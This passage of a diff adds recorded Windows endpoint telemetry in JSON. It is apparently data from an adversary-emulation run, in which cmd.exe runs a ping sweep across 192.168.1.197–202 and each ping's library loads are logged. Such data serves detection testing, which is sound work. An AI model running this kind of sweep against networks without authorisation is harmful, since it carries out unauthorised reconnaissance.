"{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 976, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572947140000, + "unique_pid": "{42FC7E13-CBAE-5C05-0000-00105A765301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 976, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572947140000, + "unique_pid": "{42FC7E13-CBAE-5C05-0000-00105A765301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 976, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572947140000, + "unique_pid": 
"{42FC7E13-CBAE-5C05-0000-00105A765301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 976, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572947140000, + "unique_pid": "{42FC7E13-CBAE-5C05-0000-00105A765301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 976, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572947140000, + "unique_pid": "{42FC7E13-CBAE-5C05-0000-00105A765301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 976, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572947140000, + "unique_pid": "{42FC7E13-CBAE-5C05-0000-00105A765301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 976, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572947140000, + "unique_pid": "{42FC7E13-CBAE-5C05-0000-00105A765301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 976, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572947140000, + "unique_pid": "{42FC7E13-CBAE-5C05-0000-00105A765301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 976, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572947140000, + "unique_pid": "{42FC7E13-CBAE-5C05-0000-00105A765301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + 
"image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 976, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572947140000, + "unique_pid": "{42FC7E13-CBAE-5C05-0000-00105A765301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 976, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572947290000, + "unique_pid": "{42FC7E13-CBAE-5C05-0000-00105A765301}" + }, + { + "event_type": "registry", + "pid": 2688, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883572949490000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010F8050200}" + }, + { + "event_type": "registry", + "pid": 2688, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883572949490000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010F8050200}" + }, + { + "event_type": "registry", + "pid": 2688, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883572949490000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010F8050200}" + }, + { + "event_type": "process", + "pid": 976, + "process_name": "PING.EXE", + "process_path": 
"C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572951990000, + "unique_pid": "{42FC7E13-CBAE-5C05-0000-00105A765301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.197", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 5012, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572952140000, + "unique_pid": "{42FC7E13-CBAF-5C05-0000-00102C7A5301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 5012, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572952140000, + "unique_pid": "{42FC7E13-CBAF-5C05-0000-00102C7A5301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 5012, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572952140000, + "unique_pid": "{42FC7E13-CBAF-5C05-0000-00102C7A5301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 5012, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572952140000, + "unique_pid": "{42FC7E13-CBAF-5C05-0000-00102C7A5301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 5012, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572952140000, + "unique_pid": "{42FC7E13-CBAF-5C05-0000-00102C7A5301}" + }, + { + 
"event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 5012, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572952140000, + "unique_pid": "{42FC7E13-CBAF-5C05-0000-00102C7A5301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 5012, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572952140000, + "unique_pid": "{42FC7E13-CBAF-5C05-0000-00102C7A5301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 5012, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572952140000, + "unique_pid": "{42FC7E13-CBAF-5C05-0000-00102C7A5301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 5012, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572952140000, + "unique_pid": "{42FC7E13-CBAF-5C05-0000-00102C7A5301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 5012, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572952140000, + "unique_pid": "{42FC7E13-CBAF-5C05-0000-00102C7A5301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 5012, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572952140000, + "unique_pid": "{42FC7E13-CBAF-5C05-0000-00102C7A5301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 5012, + 
"process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572952140000, + "unique_pid": "{42FC7E13-CBAF-5C05-0000-00102C7A5301}" + }, + { + "event_type": "process", + "pid": 5012, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572956830000, + "unique_pid": "{42FC7E13-CBAF-5C05-0000-00102C7A5301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.198", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 1976, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572956990000, + "unique_pid": "{42FC7E13-CBAF-5C05-0000-0010B07C5301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 1976, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572956980000, + "unique_pid": "{42FC7E13-CBAF-5C05-0000-0010B07C5301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 1976, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572956980000, + "unique_pid": "{42FC7E13-CBAF-5C05-0000-0010B07C5301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 1976, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572956980000, + "unique_pid": "{42FC7E13-CBAF-5C05-0000-0010B07C5301}" + }, + { + "event_type": "image_load", + "image_name": 
"KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 1976, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572956980000, + "unique_pid": "{42FC7E13-CBAF-5C05-0000-0010B07C5301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 1976, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572956980000, + "unique_pid": "{42FC7E13-CBAF-5C05-0000-0010B07C5301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 1976, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572956980000, + "unique_pid": "{42FC7E13-CBAF-5C05-0000-0010B07C5301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 1976, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572956980000, + "unique_pid": "{42FC7E13-CBAF-5C05-0000-0010B07C5301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 1976, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572956980000, + "unique_pid": "{42FC7E13-CBAF-5C05-0000-0010B07C5301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 1976, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572956980000, + "unique_pid": "{42FC7E13-CBAF-5C05-0000-0010B07C5301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 1976, + "process_name": "PING.EXE", + 
"process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572956980000, + "unique_pid": "{42FC7E13-CBAF-5C05-0000-0010B07C5301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 1976, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572956980000, + "unique_pid": "{42FC7E13-CBAF-5C05-0000-0010B07C5301}" + }, + { + "event_type": "process", + "pid": 1976, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572961990000, + "unique_pid": "{42FC7E13-CBAF-5C05-0000-0010B07C5301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.199", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 7916, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572962140000, + "unique_pid": "{42FC7E13-CBB0-5C05-0000-00101F7F5301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 7916, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572962140000, + "unique_pid": "{42FC7E13-CBB0-5C05-0000-00101F7F5301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 7916, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572962140000, + "unique_pid": "{42FC7E13-CBB0-5C05-0000-00101F7F5301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": 
"C:\\Windows\\System32\\kernel32.dll", + "pid": 7916, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572962140000, + "unique_pid": "{42FC7E13-CBB0-5C05-0000-00101F7F5301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 7916, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572962140000, + "unique_pid": "{42FC7E13-CBB0-5C05-0000-00101F7F5301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 7916, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572962140000, + "unique_pid": "{42FC7E13-CBB0-5C05-0000-00101F7F5301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 7916, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572962140000, + "unique_pid": "{42FC7E13-CBB0-5C05-0000-00101F7F5301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 7916, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572962140000, + "unique_pid": "{42FC7E13-CBB0-5C05-0000-00101F7F5301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 7916, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572962140000, + "unique_pid": "{42FC7E13-CBB0-5C05-0000-00101F7F5301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 7916, + "process_name": "PING.EXE", + "process_path": 
"C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572962140000, + "unique_pid": "{42FC7E13-CBB0-5C05-0000-00101F7F5301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 7916, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572962140000, + "unique_pid": "{42FC7E13-CBB0-5C05-0000-00101F7F5301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 7916, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572962140000, + "unique_pid": "{42FC7E13-CBB0-5C05-0000-00101F7F5301}" + }, + { + "event_type": "process", + "pid": 7916, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572966990000, + "unique_pid": "{42FC7E13-CBB0-5C05-0000-00101F7F5301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.200", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 8152, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572967140000, + "unique_pid": "{42FC7E13-CBB0-5C05-0000-00100C825301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 8152, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572967140000, + "unique_pid": "{42FC7E13-CBB0-5C05-0000-00100C825301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": 
"C:\\Windows\\System32\\ntdll.dll", + "pid": 8152, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572967140000, + "unique_pid": "{42FC7E13-CBB0-5C05-0000-00100C825301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 8152, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572967140000, + "unique_pid": "{42FC7E13-CBB0-5C05-0000-00100C825301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 8152, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572967140000, + "unique_pid": "{42FC7E13-CBB0-5C05-0000-00100C825301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 8152, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572967140000, + "unique_pid": "{42FC7E13-CBB0-5C05-0000-00100C825301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 8152, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572967140000, + "unique_pid": "{42FC7E13-CBB0-5C05-0000-00100C825301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 8152, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572967140000, + "unique_pid": "{42FC7E13-CBB0-5C05-0000-00100C825301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 8152, + "process_name": "PING.EXE", + "process_path": 
"C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572967140000, + "unique_pid": "{42FC7E13-CBB0-5C05-0000-00100C825301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 8152, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572967140000, + "unique_pid": "{42FC7E13-CBB0-5C05-0000-00100C825301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 8152, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572967140000, + "unique_pid": "{42FC7E13-CBB0-5C05-0000-00100C825301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 8152, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572967140000, + "unique_pid": "{42FC7E13-CBB0-5C05-0000-00100C825301}" + }, + { + "event_type": "process", + "pid": 8152, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572971830000, + "unique_pid": "{42FC7E13-CBB0-5C05-0000-00100C825301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.201", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 2768, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572971980000, + "unique_pid": "{42FC7E13-CBB1-5C05-0000-001083845301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": 
"C:\\Windows\\System32\\PING.EXE", + "pid": 2768, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572971980000, + "unique_pid": "{42FC7E13-CBB1-5C05-0000-001083845301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 2768, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572971980000, + "unique_pid": "{42FC7E13-CBB1-5C05-0000-001083845301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 2768, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572971980000, + "unique_pid": "{42FC7E13-CBB1-5C05-0000-001083845301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 2768, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572971980000, + "unique_pid": "{42FC7E13-CBB1-5C05-0000-001083845301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 2768, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572971980000, + "unique_pid": "{42FC7E13-CBB1-5C05-0000-001083845301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 2768, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572971980000, + "unique_pid": "{42FC7E13-CBB1-5C05-0000-001083845301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 2768, + "process_name": "PING.EXE", + "process_path": 
"C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572971980000, + "unique_pid": "{42FC7E13-CBB1-5C05-0000-001083845301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 2768, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572971980000, + "unique_pid": "{42FC7E13-CBB1-5C05-0000-001083845301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 2768, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572971980000, + "unique_pid": "{42FC7E13-CBB1-5C05-0000-001083845301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 2768, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572971980000, + "unique_pid": "{42FC7E13-CBB1-5C05-0000-001083845301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 2768, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572971980000, + "unique_pid": "{42FC7E13-CBB1-5C05-0000-001083845301}" + }, + { + "event_type": "process", + "pid": 2768, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572976990000, + "unique_pid": "{42FC7E13-CBB1-5C05-0000-001083845301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.202", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 6828, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 
131883572977130000, + "unique_pid": "{42FC7E13-CBB1-5C05-0000-0010F2865301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 6828, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572977140000, + "unique_pid": "{42FC7E13-CBB1-5C05-0000-0010F2865301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 6828, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572977140000, + "unique_pid": "{42FC7E13-CBB1-5C05-0000-0010F2865301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 6828, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572977140000, + "unique_pid": "{42FC7E13-CBB1-5C05-0000-0010F2865301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 6828, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572977140000, + "unique_pid": "{42FC7E13-CBB1-5C05-0000-0010F2865301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 6828, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572977140000, + "unique_pid": "{42FC7E13-CBB1-5C05-0000-0010F2865301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 6828, + "process_name": "PING.EXE", + "process_path": 
